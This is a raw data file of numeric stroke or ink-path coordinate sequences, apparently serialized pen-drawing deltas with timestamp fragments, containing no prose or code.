0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,18 0,-18 0,0 0,1 0,-1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27.6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842 12301,'18'0,"37"0,-1 0,37 0,-19 0,74 0,-1 0,0 0,36 0,-36 0,37 0,-1 0,1 0,-1 0,37 0,0 0,36 0,-37 0,55 0,-18 0,37 0,17 0,-72 0,54 0,-54 0,36 0,-54 0,18 0,-18 0,-73 0,-18 0,-55 0,-35 0,-19 18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09:34.1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85 4445,'18'0,"1"0,17 0,73-36,-73 36,73-18,18-1,18 19,0 0,0 0,-18 0,37 0,-37 0,-55 0,1 0,-1 0,37 0,-54 0,17 0,-17 0,-1 0,0 0,-17 0,-1 0,18 0,1 0,-1 0,19 19,36-19,-37 0,37 0,18 0,0 0,18 0,0 0,37 0,-1 0,37 0,18 0,0 0,54 0,-72 0,54 0,-36 0,0 0,18 18,-73-18,19 0,-55 0,54 18,-90 0,18-18,0 0,0 0,0 18,-54-18,17 0,19 0,-18 0,36 0,-18 0,0 0,18 0,-37 0,-17 0,0 0,-19 0,-18 0,37 18,-1 0,-53-18,17 0,0 0,0 0,1 0,-19 0,0 0,18 0,-18 0,19 0,-19 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,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18.3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74 10054 0,'-17'0'16,"17"18"15,17-18 31,54 0-46,123 0-16,35 0 16,0 0-16,18 0 15,0 0-15,71 0 16,17 0-16,18 0 16,-71 0-16,18 0 15,-71 0-15,0 0 16,-35 0-16,-53 0 15,1 0-15,-72 0 16,-17 0-16,-35 0 16,-1 0-16,1 0 15,17 0 1,-17 0-16,0 0 16,-1 0-16,18 0 15,18 0-15,-17 0 16,17 0-16,17 0 15,1 0-15,-1 17 16,1-17-16,-1 0 16,19 18-16,-37-18 15,1 0-15,-17 0 16,34 18-16,-17-18 16,18 0-16,-54 17 15,36-17 1,-17 18-16,-1-18 15,18 0-15,-18 0 16,-17 0-16,52 0 16,1 0-16,35 0 15,35 0-15,0 18 16,-18-18-16,-17 0 16,18 0-16,-54 0 15,-52 0-15,-1 0 16,1 0-16,0 0 125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10:05.0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269 4391,'36'0,"19"0,35 0,-17 0,54 0,18 0,0 0,0 0,19 0,-19 0,-18 0,36 18,-54-18,-36 0,-1 0,-17 0,-1 0,-18 0,1 0,-19 0,0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10:18.37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734 6912,'0'0,"18"0,1 0,17 0,-18 0,18 0,19 0,35 0,19 0,0 0,18 0,36 0,-17 0,-19 0,18 0,-18 0,18 0,0 0,-18 0,-18 0,18 0,0 0,18 0,0 0,-18 0,36 19,-36-19,0 0,19 0,-38 0,19 0,-36 0,0 18,-37-18,-17 0,-1 0,-18 18,18-18,1 0,-1 0,-18 0,36 0,-17 0,-1 0,0 0,1 0,-1 0,-18 0,0 0,0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10:19.4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651 7275,'0'0,"18"-18,0 18,0 0,1 0,-1 0,18 0,-18 0,0 0,19 0,17 0,19 0,35 0,-17 0,54 0,37 0,-37 0,36 0,1 0,17 0,1 0,-1 0,-35 0,-19 0,54 0,-35 0,-37 0,18 0,0 0,-54 0,18 0,-37 0,-17 0,-1 0,-36 0,0 0,0 0,1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0T01:10:20.7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52 8291,'18'18,"19"-18,17 0,19 0,-1 0,19 0,36 0,0 0,18 0,-36 0,0 0,-18 0,-19 0,-17 0,-37 0,0 19,0-19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1:31.4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05 6068 0,'17'0'31,"1"0"-15,0 0-16,-1 0 16,1 17-16,0-17 15,-1 18 1,1-18-16,-1 0 15,1 0 1,17 0-16,1 0 0,-1 0 16,-17 0-1,-1 0-15,1 0 16,35 0 0,-36 0-16,1 0 0,0 0 15,17 0 1,0 0-16,-17 0 15,0 0-15,34 0 16,-34 0-16,0 0 16,-1 0-16,1 0 15,0 0-15,-1 0 16,19 0-16,-19 0 16,18 0-16,1 18 15,17-1-15,-36-17 16,1 0-16,17 0 15,-17 18-15,17-18 16,0 0 0,-17 0-1,0 0-15,17 0 16,36 0-16,70 0 16,35 0-16,36 0 15,-1 0-15,1 0 16,-71 0-16,-53 0 15,-35 0 1,-17 0-16,-19 0 125,-17-18 109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1:36.3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02 5997 0,'18'0'16,"17"0"-1,36 18-15,17-1 16,35 1-16,54 0 16,-36-18-16,-18 0 15,-17 0-15,35 0 16,0 0-16,36 17 16,-19-17-1,1 0-15,-35 0 16,17 0-16,-18 0 15,1 0-15,-71 0 16,0 0-16,-1 0 16,-16-17-1,-19 17-15,1-18 16,0 18-16,-1 0 16,19 0-1,-1-18-15,35 18 16,1-17-16,35-1 15,0 1-15,17-1 16,-35 18-16,-17-18 16,-1 18-16,-17 0 15,0 0-15,0 0 16,0 0-16,-18 0 16,18 0-16,-17 0 15,-1 0 1,-18 0-16,36 0 0,-17 0 15,17 18-15,17 0 16,-35-18 0,-17 0-16,0 0 15,-1 17 1,1-17 0,0 0-1,-1 0 1,1 0-1,-1 0-15,1 0 16,0 0-16,-1 0 16,1 0-1,0 0 1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1:37.88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799 6121 0,'0'0'0,"35"0"15,-17 0-15,0 0 16,17 0-16,-18 0 15,1 0-15,17 0 16,18 0-16,18 0 16,52 0-16,1 0 15,35 0-15,35 0 16,-18 0-16,18 0 16,0 0-16,-35 0 15,17 0 1,18 0-16,18 0 15,0 0-15,-1 0 16,-17 0-16,0 0 16,-17 0-16,-19 0 15,-16 0-15,-1 0 16,-18 0-16,1 0 16,-36 0-16,-18 0 15,-17 0-15,-35 0 16,17 0-16,-17 0 15,-18 17 173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1:49.1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69 7549 0,'36'0'94,"70"18"-94,-1-18 15,37 35-15,-19-17 16,0 0-16,19-1 16,-19 1-16,18 0 15,0-1-15,0 1 16,0-1 0,18 1-16,-53-18 0,35 0 15,53 0 1,-35 0-16,-36 0 15,-70 0-15,0-18 16,-35 18-16,0-17 16,-1 17-1,-34 0 251,-1-18-250,0 1 15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1:51.3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90 7638 0,'18'0'31,"17"0"-31,18 0 16,18 0-16,17 0 16,35 0-16,-17 0 15,71 0-15,-36 0 16,17 0-16,36 0 16,-35 0-16,0 0 15,35 0 1,-35 0-16,35 0 15,17 0-15,-34 0 16,34 0-16,1 0 16,-18 0-16,18 0 15,0 0-15,-36 0 16,18 0-16,-35 0 16,35 0-16,-36 0 15,-16 0-15,-1 0 16,35 0-16,-17 0 15,-36 0-15,-35 0 16,1-18-16,-54 18 16,35-18-16,-52 18 15,0 0 1,17 0 0,-17 0-16,17 0 15,0 0-15,18 0 16,-18 18-16,1 0 15,-1-1-15,0-17 16,18 0-16,18 0 16,17 18-16,0 0 15,18-18-15,-35 17 16,-19 1-16,-16-18 16,17 17-16,-18-17 15,0 0-15,-17 0 16,17 0-16,-17 0 15,-1 18 17,-17 0 155,0-1-156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2:01.15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4304 0,'0'0'0,"53"0"16,-18 0-16,36 0 15,-18-18-15,53 1 16,-1-1 0,-16 18-16,-1 0 0,35 0 15,-17 0-15,-35 0 16,-1 0 0,-17 18-16,0-18 0,0 17 15,-18 1-15,18-18 16,53 18-1,-18-18-15,53 0 16,0 0-16,18 0 16,-18 0-16,36 0 15,-19 0-15,1 0 16,-18 0-16,-17 0 16,-18 17-16,-18 1 15,-35-18-15,17 0 16,18 17-16,-35-17 15,0 0-15,-18 0 16,1 0-16,-1 0 16,0 0-16,1 0 15,-19 0-15,1 0 16,0 0-16,17 0 16,-18 0-1,19 0 1,-19 0-1,19 18-15,-1-18 16,18 18-16,17-18 16,1 17-1,-18-17-15,53 0 16,-36 0-16,1 0 16,-1 0-16,1 0 15,35-35-15,-53 17 16,0 1-16,-1 17 15,1 0-15,0 0 16,-17 0-16,17 0 16,-18 0-16,0 0 15,-17 0-15,-1 0 16,1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19.5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458 10072 0,'-17'0'15,"-1"0"-15,1 0 63,87 0 15,124 0-78,18 0 0,-18 0 15,0 0-15,53 0 16,17 0-16,-17 17 16,-35 1-16,53-18 15,-36 0 1,-35 0-16,-18 0 16,1 0-16,-1 0 15,-52 0-15,17 0 16,-35 0-16,-36 0 15,1 0-15,-36 0 16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2:03.7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83 4304 0,'35'0'63,"18"0"-48,18 0-15,-1 0 16,54 0-16,-1 18 16,19-1-16,16-17 15,1 35-15,53-35 16,35 0-16,0 0 16,17 0-16,54 0 15,-71 18-15,52-18 16,19 35-16,-18 18 15,17-35-15,-17 0 16,-88-18-16,17 0 16,-17 0-16,-18 0 15,-18 0-15,1 35 16,-36-35-16,0 0 16,0 0-16,0 0 15,-17 0-15,-19 0 16,1-18-1,0 18-15,-35 0 16,-18-17-16,17 17 16,-17-18-16,0 18 15,0-18-15,-18 18 16,0 0-16,1 0 16,-19 0-1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2:04.6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986 4357 0,'0'-18'31,"18"-17"-31,35 17 16,-18 1-16,18 17 16,18 0-16,52 0 15,18 0-15,18 0 16,35 0-16,0 0 16,-18 0-16,-35 0 15,-52 0-15,34 0 16,1 0-16,-1 0 15,-17 0-15,35 0 16,-18 0 0,-34 0-16,17 0 0,-18 17 15,18 1-15,-36 0 16,18-1 0,36-17-1,-107 0 1,1 0 15,17 0-15,1 0-16,16 18 15,1-1-15,36 1 16,16 0-16,-34-18 16,-18 17-16,-18-17 15,18 0-15,-35 0 94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41.6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30 4227,'-18'0,"0"0,0 0,36 0,55-18,-1 0,55 18,0 0,37 0,-19 0,0-18,-18 18,18 0,18 0,-36 0,-36 0,-18 0,17 0,-35 0,-19 0,-36 18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42.7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8 4372,'0'0,"36"0,18-18,19 18,18 0,17 0,38 0,-38 0,110 37,-18-37,17 18,19 0,-18-18,36 0,-18 0,18 0,18 0,-36 18,36-18,-54 0,18 0,18 18,54-18,-18 0,-54 18,-18 0,36-18,-18 19,36-19,-73 0,55 0,-72 0,36 0,-37 0,0 0,19 0,18 0,-1 0,1-19,0 19,-37-18,1 0,17 18,-54 0,1 0,-1 0,-36 0,36 0,-36 0,-19 0,19 0,-36 0,-19 0,-18 0,1 0,-1 0,0 0,-18 0,19 0,-19 0,18 0,-18 0,37 18,-19-18,18 0,-35 0,17 0,-18 0,36 0,-35 0,-1 0,0 0,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47.2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224 9960,'18'0,"19"0,35 0,1 0,54 0,18 0,18 0,19 0,-19 0,0 0,-18 0,0 0,1 0,-1 0,-18 0,0 0,-37 0,19 0,0 0,0-18,18 18,-18 0,0 0,0 0,18 0,-19 0,1 0,0 0,-18 0,18 0,-19 0,110 0,-55 0,-54 0,18 0,-55 0,1 0,-1 0,0 18,1 1,-1-19,55 18,-18-18,18 18,18-18,-37 18,19-18,-36 0,-19 0,1 0,-1 18,37 0,-55-18,0 0,-17 18,17-18,18 0,19 0,-1 19,1-19,-37 0,1 0,-1 0,0 0,0 0,-17 0,35 0,0 0,-35 0,17 0,-18 0,18 0,37 0,-37 0,0 0,-17 0,-1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48.5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72 10922,'18'0,"0"0,37 0,17 0,19 0,54 0,19 0,-1-18,-36 0,72 18,-53-18,35 18,-36 0,37 0,-37 0,0 0,0 0,0 0,18 0,-17 0,-1 0,0 0,36 0,1 0,35 0,1 0,18 0,36 0,-54 0,36 0,0 0,0 0,18 0,-18 0,18 0,-18 0,-18 0,36 0,-36 0,-18 0,-1 0,-17 0,-19 0,1 0,-73 0,18 0,0 0,0 0,-55 0,1 0,-37 0,0 0,-17 0,-19 18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20.1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4374 0,'35'0'46,"36"0"-30,35 36-16,17-19 16,18 1-16,36 0 15,-19-1-15,1 1 16,18-18 0,-19 18-16,-34-1 15,-71-17-15,0 0 16,-36 0-16,-17 18 156,0-1-109,-17-17 62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22.19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05 7461 0,'17'0'93,"19"0"-93,16 18 16,19 0-16,17-18 16,18 0-1,-18 0-15,0 0 16,36 0-16,-1 17 16,-34-17-16,34 18 15,-17-1-15,17 19 16,-52-36-16,35 17 15,-36-17-15,18 0 16,18 0-16,-18 0 16,36 0-16,52 0 15,89 36-15,-18-1 16,0-17-16,53 34 16,-71-16-16,0-1 15,-35-17-15,-35-1 16,35 19-16,-53-19 15,36 1-15,-36 17 16,0-17-16,0 17 16,-18-35-16,1 18 15,17-1-15,-18-17 16,19 0-16,-37 0 16,36 0-16,18 0 15,-18 0-15,-35 0 16,18 0-1,-36 0-15,0 0 16,-17 0-16,-36 0 0,0 0 16,-17 0-1,-1 0-15,1 0 16,0 0-16,17 0 16,-17 0-16,-1-17 15,36-1-15,35 18 16,-17-18-16,52 1 15,-17-1-15,-35 1 16,17 17-16,35-36 16,-34 19-16,-1-19 15,18 36-15,-18-17 16,18-1-16,17 18 16,-17 0-16,17 0 15,1 0-15,-1 0 16,19 0-16,-1 0 15,17 18-15,36-1 16,-35 19-16,18-1 16,17-17-1,-36-18-15,-17 0 0,18 0 16,18 0-16,-1 0 16,0 0-1,1 0-15,17 0 16,0 0-16,-35 0 15,-1 0-15,19 0 16,17 0-16,0 0 16,0 0-16,17 0 15,1 0-15,-35 0 16,34 0-16,-17-53 16,-53 35-16,36 0 15,-19 18-15,1 0 16,18 0-16,-1 0 15,0 0-15,1 36 16,-54-19-16,1 1 16,-18-18-16,17 18 15,-52-18-15,-36 0 16,18 0-16,-36 0 16,1 0-1,0-18-15,-1-17 31,1 17 32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24.3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685 9102 0,'-18'0'0,"1"17"16,-36-17-16,18 0 15,-18 0-15,-36 0 16,37 0-16,-1 0 15,-71 0-15,-52 0 16,-1 0-16,19 0 16,-54 0-16,0 0 15,-35 0-15,0 0 16,-35 0-16,18 0 16,-301 0-1,212 0-15,-35 0 16,53 0-16,53 0 15,-18 0-15,18 0 16,53 0-16,-18 0 16,35 0-16,-17 0 15,17 0-15,-17 0 16,17 0 0,-35 0-16,0 0 15,18-17-15,-1-1 16,-16-17-16,34 17 15,0-17-15,18 0 16,35 17-16,18 0 16,-17-17-16,16 35 15,1-18-15,18 1 16,-1-1-16,19 0 16,-19 18-16,18 0 15,0 0-15,1 0 16,16 0-16,-16 0 15,16 0-15,1 0 16,-88 0-16,17-35 16,-17 0-16,-18 0 15,35 17 1,-35-35-16,17 35 0,1-17 16,-18 0-16,18 17 15,-1 1 1,-17-19-16,35 36 0,-17 0 15,70 0-15,-17 0 16,52 0 0,1 0-16,17 0 15,0 0-15,0 0 16,0 0-16,0 0 16,-17 0-16,17 0 15,-18 0-15,-35 0 16,53 0-16,-17 18 15,-36 17-15,35-35 16,-17 35-16,0 1 16,-18-19-16,36 1 15,-19 17-15,36-35 16,-17 18-16,-1-18 16,1 18-16,-1-18 15,1 0-15,17 17 16,18-17-16,-36 0 15,36 0-15,-36 0 16,1 0-16,17 0 16,0 0-16,17 0 15,-34 0-15,17 0 16,18 0-16,-1 0 16,-16 0-1,34 0-15,-17 18 16,17-18-16,0 0 15,1 0-15,-1 0 16,0 18-16,-35-1 16,36-17-1,-18 18-15,-1-18 16,19 17-16,-1 1 16,0-18-1,1 0 32,-1 18-31,0-18-1,-17 17 32,18 1-31,-19-18-1,19 18-15,-1-18 16,-17 0-16,17 17 16,0-17-1,-17 0-15,-18 0 0,0 0 16,18 0 0,17 18-16,1-18 15,-19 0-15,19 0 47,-1 0-16,1 0-31,-1 0 16,0 18-16,1-18 16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2:32.3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80 2011 0,'0'-18'16,"18"1"-1,-1 17 1,19 0 0,-1 0-16,-18-18 15,36 18-15,18 0 16,35-18-16,53 1 16,52-1-16,36 18 15,35 0 1,1 0-16,105 0 0,-53 0 15,70-35-15,1-18 16,88 0-16,-35 0 16,-124-18-16,18 19 15,17 16-15,-52-17 16,-19 18-16,72-18 16,-18 35-1,70 18-15,71 0 16,-71 0-16,18 0 15,-159 0-15,-17 0 16,-18 0-16,0 0 16,-18 0-16,18 0 15,0-35-15,0 35 16,18 0-16,-19 0 16,-16 0-16,34 0 15,1 0-15,-36 0 16,1 0-16,-1 0 15,-18-17-15,-16-19 16,-37 19-16,19-19 16,-36 19-16,0-1 15,-35 18-15,-18-18 16,0 1-16,-17 17 16,-1 0-16,1-18 15,-18 18-15,0 0 16,0 0-16,-18 0 15,0 0 1,-17 0-16,-1 0 0,1 0 31,0 0-31,17 0 16,18 0 0,17 0-16,19 18 15,-19-1-15,36 19 16,-35-19-16,34 19 15,-16-19-15,16 19 16,-52-19-16,35 1 16,-35-1-16,0 1 15,-35 0-15,35-1 16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20.82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456 10001 0,'17'0'125,"54"0"-110,35-17-15,17 17 16,18-53-16,0 53 15,1-18-15,-19 0 16,18 1-16,-17 17 16,-36-36-16,-18 36 15,-17 0-15,-35 0 16,17 0-16,-17 0 16,35 0-16,-36 0 15,1 0-15,0 0 16,-1 0-16,19 0 15,-19 0-15,36 0 16,0 0-16,35 0 16,18 0-16,18 0 15,-36 0-15,-18 0 16,-17 0-16,18 0 16,-54 0-16,36 0 15,0 0 1,-17 0-16,16 0 0,-34 0 15,17 0 1,36 0-16,-53 0 16,34 0-16,-34 0 15,0 0-15,-1 0 16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03.71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175 13371,'18'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6:30.4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81 4518,'0'0,"19"0,17 0,18 0,19 0,18-37,17 37,19-18,19 0,53 0,19 18,72 0,109 0,91 0,54 0,-54 0,18 0,0 36,-54 0,18 19,90 36,-108 17,72 1,-18-54,54 17,55-54,-91-18,127 37,-108-37,71 54,-71-18,-92-36,110 55,-110-19,-35-18,-110 0,-54 1,18-19,-36 0,-36 18,-55-18,18 0,-36 18,-18-18,-37 0,1 0,18 18,-19-18,19 18,-55 0,19 0,-37-18,36 0,-36 19,1-19,-1 0,18 0,0 0,-18 0,1 0,-1 0,0 0,0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36.18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22 1887 0,'-36'0'63,"-34"0"-63,-1 0 15,-52 0-15,-1 0 16,1 0-16,-18 0 16,35 0-16,-35 0 15,-18-35-15,88 35 16,1-18-16,-18 1 15,70 17-15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39.6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40 4480 0,'18'-17'15,"17"17"64,-17 0-79,17 0 15,35 0-15,36 0 16,0 0-16,18 0 15,17 0-15,0 0 16,-18 0-16,1-18 16,-18 18-16,-1 0 15,-34 0-15,-18 0 16,17 0-16,-17 0 16,-17 0-1,17 0-15,17 0 0,-17 0 16,18 0-16,34 18 15,-16-1 1,16 1-16,19-18 0,35 18 16,-18-18-16,0 17 15,-18-17 1,18 35-16,-17-17 16,-1 0-16,1-1 15,-36-17-15,18 18 16,-71-18-16,18 0 15,0 18-15,-18-18 16,1 0-16,-19 0 16,36 0-16,-18 0 15,18 0-15,35 0 16,18 0-16,-17 17 16,16 1-16,19 0 15,17-1-15,0 1 16,-17-1-16,17 1 15,-36 0-15,-16-1 16,-19-17-16,18 0 16,-17 0-16,-18 18 15,17-18-15,1 18 16,17-18-16,0 17 16,18 1-16,-53-18 15,18 18-15,-18-18 16,17 0-16,-35 0 15,18 0-15,-17 0 16,17 0-16,-1 0 16,19 0-16,0 0 15,-1 0-15,36 0 16,-18 0-16,-17 0 16,35 0-16,-36 0 15,1 0-15,-1 0 16,1 0-16,-1 0 15,54 0 1,-1 0-16,-35 0 16,36 0-16,17 0 15,-53 0-15,53 0 16,-35 0-16,-18 0 16,18 0-16,0 0 15,-18 0-15,-17 0 16,-18 0-16,17 0 15,-17 0-15,18 0 16,-1 17-16,1-17 16,-18 18-16,53-18 15,-53 0-15,52 0 16,1 0-16,18 0 16,-19 0-16,-16 0 15,-19 18-15,36-1 16,-35-17-16,140 0 31,-158 0-15,-18 0-16,1 0 0,-19 0 15,1 0-15,35 0 16,-35 0-16,-1 0 16,19 0-16,-19 0 15,36 0 1,-18 0-16,18 0 15,18 0-15,-1 0 16,-34 0-16,17 0 16,-1 0-16,1 0 15,-17 0-15,17 0 16,-1 0-16,19 0 16,35 0-16,-18 0 15,-17 0-15,52 0 16,-35 0-16,36 0 15,-1 0-15,-17 0 16,18 0-16,-1 0 16,0 0-16,-34 18 15,52-1-15,0 1 16,-18 0-16,1-1 16,-1-17-16,18 0 15,-17 0-15,35 0 16,-36 0-16,18 0 15,18 0-15,-36 0 16,1 0 0,-18 0-16,0 0 0,-18 0 15,-18 0-15,36 0 16,-35 0 0,-18 0-16,0 0 15,-18 0-15,18 0 16,-36 0-16,36 0 15,-35 0-15,0 0 16,-1 0-16,1 0 16,0 0-1,-1 0 17,1 0-17,-1 0 1,1 0-1,0 0-15,-1 0 32,19 0-32,-19 0 15,1 0-15,35 0 16,-18 0-16,36 0 16,-36 0-16,18 0 15,0 0-15,0 0 16,-18 0-1,-17 0-15,-1 0 16,1 0 0,17 0-16,0 0 15,18-17-15,-35 17 16,17-18-16,1 18 16,-19 0-1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41.34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141 1799 0,'18'0'31,"-1"0"-15,1 0 0,17 0-1,18 0-15,-18 18 16,36-18-16,52 17 16,-17-17-1,35 0-15,53 0 0,0 0 16,-17 0-16,34 0 15,-34-17 1,17-1-16,-35 1 0,35 17 16,-18 0-1,18 0-15,-18 0 16,36 0-16,0 0 16,-1 0-16,1 0 15,0 0-15,-1 17 16,1 1-16,0 17 15,-18-17-15,0 17 16,0-17-16,-35 35 16,35-36-16,-36 1 15,36-1-15,53 19 16,-17-1-16,-19 0 16,-17-17-16,-53 0 15,18 17-15,-35-18 16,-18-17-16,17 36 15,0-19-15,1 1 16,-36-18-16,18 18 16,-35-1-16,-1 1 15,-17 0-15,-18-1 16,-17-17-16,0 0 16,-1 0-16,1 0 15,-1 0 1,1 0-16,0 0 15,-1 0-15,19 0 16,-1 0-16,0 0 16,0 0-1,-17 0 1,0 0 0,-1 0-16,1 0 15,0 0 1,-1 0-1,19 0-15,-19 0 0,1 0 16,0 0-16,-1 0 16,1-17-1,-18-19 48,-18 36-63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54.90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10 6227 0,'35'0'110,"1"0"-95,52 0-15,18 0 16,35 0-16,35 0 15,0 0-15,1 0 16,-36 35-16,-35-35 16,-89 0-16,-34 0 47,-1 0-32,1 0-15,-1 0 47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23:56.16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332 6209 0,'0'-18'47,"36"18"-47,17 0 16,52 0-16,37 0 15,34 0-15,0 0 16,54 0-16,69 0 15,54 18-15,-106-18 16,18 0-16,17 0 16,-17 35-16,52-17 15,-35 17-15,-52-35 16,69 53-16,-52-53 16,36 0-16,-36 0 15,-36 0-15,-52 35 16,0-35-16,17 0 15,-52 0-15,-19 0 16,1 18-16,-35 0 16,-1-18-16,-17 0 15,0 17-15,18 1 16,-36-18 0,18 17-16,17 1 15,19 0-15,-19-1 16,54 19-16,-1-19 15,-35-17-15,36 18 16,-1 0-16,-17-1 16,-35-17-16,-36 0 15,-17 0-15,-1 0 16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5:50.6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572 9761,'0'0,"18"0,-18 18,37-18,-1 0,18 0,1 0,35 0,1 0,54-18,0 18,55-55,0 55,35 0,19-36,-18 36,18 0,55-36,35 36,56 0,108 0,-109 0,109 36,-109-36,91 0,-91 0,-54 0,-37 0,37 0,18 18,-19-18,-53 0,-19 0,18 0,-36 0,-54 0,-1 0,-36 0,55 0,-36 0,-37 0,-36 0,18 0,-37 0,19 0,-18 0,18 0,0 0,18 0,0 0,18 0,0 0,0 0,0 18,0 1,-36-19,54 36,19-36,-91 0,72 0,-18 0,36 0,-17 0,-1 0,18 0,19-18,-37 18,1-18,-37-1,0 19,0 0,-37 0,-17 0,36 0,-37 0,-17 0,-1 0,1 0,17 0,1 0,-1 0,-17 19,72-19,-37 0,1 0,18 0,0 0,-18 0,-19 0,55 18,55 0,-92 18,110-18,-1 0,19-18,-36 0,-1 0,-36 0,18 0,-17 0,-56 0,1 0,-18 0,-37 0,0 0,-18 0,0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21T02:25:43.78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040 6858,'18'0,"0"0,18 0,19 0,-1 0,19 0,-1 0,55 0,-18 0,91 0,-37 0,36-18,-35 18,17 0,-18 0,-17-18,17 18,-36 0,0 0,0 0,-36 0,-1 0,19 0,-18 0,36 0,0 0,-36 0,36 0,0 0,-37 0,37 0,-36 0,36 0,0 18,0-18,18 0,0 0,-36 0,18 0,18 0,37 0,-73 0,72 0,-18 0,1 0,17 0,-36 0,18 0,-17 0,17 0,-18 0,36 0,-35 0,-1 0,0 0,0 0,-18 0,18 0,-36 0,18 0,-18 0,-18 18,17-18,-35 0,18 0,18 0,-37 0,19 0,18 0,-37 0,19 18,18-18,-37 0,19 0,-18 0,36 0,-37 0,1 0,54 0,-37 0,19 0,-18 0,-37 0,19 0,-19 0,19 0,-37 0,19 0,-1 0,-18 0,1 0,17 0,19 0,-19 0,1 18,-1-18,19 0,35 0,1 0,-18 0,18 18,-55-18,19 0,-37 0,0 19,-17-19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17.7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44 1870 0,'0'0'0,"0"-18"16,35 0-1,0 18 1,18-17-16,53 17 16,70 0-16,1 0 15,34 0 1,107 0-16,35 0 15,35 0-15,141-18 16,-194 18-16,71-53 16,88 53-16,-247-17 15,52-1-15,-69 18 16,-36 0-16,-88 0 16,-1 0-16,-34 0 15,-36 0-15,-17 0 16,17 0-16,-17 0 15,-1 0 1,1 0-16,0 0 16,-1 18-16,1-18 15,-18 17 1,18-17 15,-1 0 32,1 0-63,0 0 15,-1 0 1,1 0-16,17 0 16,0 0-16,1 0 15,-19 0-15,1 0 16,0 0 78,-18 18-6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0:48:36.5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097 4028,'18'0,"0"0,19 0,-1 0,55 0,18 0,-1 0,74 0,-19 0,0 0,37 0,0 0,-37 0,-18 0,-18 0,-36-18,-37 18,-36 0,19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22.6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03 11289 0,'0'0'0,"18"0"0,17 0 15,-17 0 1,52 0 0,1 0-16,88-35 15,-18 35-15,35-18 16,18-17-16,-17 35 15,-89-18-15,-18 18 16,-17-18-16,0 18 16,-35 0-16,17 0 15,0 0-15,36 0 16,52-17-16,-34 17 16,34 0-16,71 0 15,-17 0-15,17 0 16,17 0-16,-52 0 15,17 0-15,-35 0 16,1 0-16,16 0 16,-17 0-16,-17 0 15,-53 0-15,-1 0 16,1 0-16,-18 0 16,-36 0-16,54 0 15,-18 0-15,0 0 16,-18 17-16,35-17 15,-17 0 1,0 0 0,0 0-16,18 0 0,52 0 15,18 0 1,-35 0-16,35 0 16,-17 0-16,17 0 15,-18 0-15,1 18 16,-1 0-16,-52-18 15,-1 17-15,1-17 16,-18 36-16,35-36 16,0 17-16,0 1 15,1 0-15,-36-18 16,17 0-16,-35 0 16,-17 17-16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19.0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134 1764 0,'53'0'62,"0"0"-62,35 0 16,18 0-16,0 0 15,17 0-15,18 0 16,1 0-16,52 0 16,-18 0-16,0 0 15,36 0-15,-53 0 16,0 0-16,17 0 16,-17 0-16,-18 0 15,0 0-15,18 0 16,-1 18-16,-16 17 15,16-18-15,19 1 16,-54 0-16,18 17 16,0-35-16,-17 18 15,17 17-15,-18-35 16,-52 18-16,-36-1 16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09.0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978 1834 0,'35'0'47,"-17"-17"-47,0-1 16,17 18-1,-17-35-15,17 17 16,18 1-16,0-1 16,0 0-16,35 18 15,35-17-15,18 17 16,71 0-16,0 0 16,-18 0-16,35 35 15,36 0-15,-36-17 16,71 17-16,-36 0 15,-34-35-15,-1 0 16,0 0-16,18 0 16,-17 0-16,17 0 15,0 0-15,-71 0 16,18 0-16,0 0 16,-35 0-16,-18 0 15,0 0-15,-18 0 16,-17 0-16,18 0 15,17 0-15,-18 0 16,36 0-16,-18 0 16,36 0-16,-19 0 15,1 0-15,-18 0 16,53 18-16,0-18 16,-35 18-16,0-1 15,-1 1-15,-34 0 16,-36-1-16,18 1 15,-18 0 1,0-18-16,-35 0 16,-17 17-16,-1-17 0,-18 0 15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10.6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27 3810 0,'-18'0'0,"1"0"15,-36 0 1,35 0-16,-17 0 15,0 0-15,-18 0 16,17 0-16,-34-18 16,-1 1-16,1 17 15,-1 0-15,1 0 16,-1 0-16,0 0 16,1 0-16,-1 0 15,-17 0-15,18 0 16,17 0-16,-18 0 15,18 0-15,0 0 16,18 0-16,17 0 16,1 0-16,-1 0 15,0 0-15,1 0 16,-1 0 0,1 0-1,-1 0-15,0 0 31,18-18 94,0 0-93,-17 1-17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45.13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6809 7320 0,'17'0'31,"1"0"0,0 0-31,-1 0 16,18-18-16,18 18 15,-17 0-15,-1-17 16,18 17-16,-18 0 16,36 0-16,-18 0 15,35 0-15,53 0 16,-18 0-16,18 17 16,36 1-16,-36 0 15,0-1-15,-17 1 16,17 0-16,-18-1 15,1 1-15,-36-18 16,18 0-16,-53 0 16,-18 0-1,18 0-15,-18 0 0,0 0 16,18 0 0,-35 0-16,17 0 15,0 0-15,1 0 16,-19 0-16,19 18 15,-19-18-15,36 17 16,-18-17-16,-17 0 16,17 0-16,-17 0 15,0 0 1,-1 0-16,1 0 16,17 0-1,-17 0-15,17 0 16,36 18-16,-18-18 15,17 18-15,18-18 16,-35 0-16,35 17 16,1 1-16,16-18 15,-16 0-15,17 0 16,-36 0-16,1 0 16,-18 0-16,-18 0 15,0 0-15,-17 0 16,-1 0-16,1 0 15,0-18-15,17 18 32,-17 0-17,-1 0-15,18 0 16,-17 0-16,0 0 16,-1-17-1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3:48.25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1765 7391 0,'0'0'0,"-17"17"16,17 1-16,-18 0 15,-17-1 1,17-17-16,0 0 16,-17 18-16,-18-18 15,18 0-15,-36 0 16,-35 0-16,-35 0 15,-35-18-15,-36-17 16,36 17-16,-53-17 16,17 17-16,36-35 15,-1 36-15,36-1 16,18 1-16,52 17 16,53 0-16,-17 0 15,17 0 16,1 35-15,17-18 0,-18-17-1,1 0 1,-1 0 0,-17 0-16,17 0 15,0 0-15,-17 0 16,0 0-16,0 0 15,-1 0-15,19 0 16,-1 0-16,-35 0 16,35 0-1,1 0 1,17-17 0,-18 17-16,0-18 15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4:38.7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98 4163 0,'0'0'0,"-17"0"0,-19 0 16,19 0-1,-1 0-15,-17 0 16,-1 0-16,-16 0 16,16 0-16,-17 0 15,0 0-15,0 0 16,-17 0-16,-1 0 16,1 0-16,-1 0 15,-35 0 1,18 0-16,18 0 15,-1 0-15,-35 0 16,36 0-16,-1 0 16,18 0-16,0 0 15,18 0-15,0 0 16,17 0-16,1 0 16,-1 0-16,0 0 140,1 17-93,-1-17-16,0 18 1,1-18-17,-1 0-15,0 0 31,18 18-15,-17-18 0,-1 0-16,-17 0 15,17 0-15,-17 0 16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4:40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402 1482 0,'17'0'16,"36"0"0,18 0-16,52 0 15,18 0-15,18 0 16,-18 0-1,0 0-15,0 0 0,0 0 16,-17 0 0,-1 0-16,18 0 15,-17 0-15,-36 0 16,36 0-16,-36 0 16,18 0-16,-18 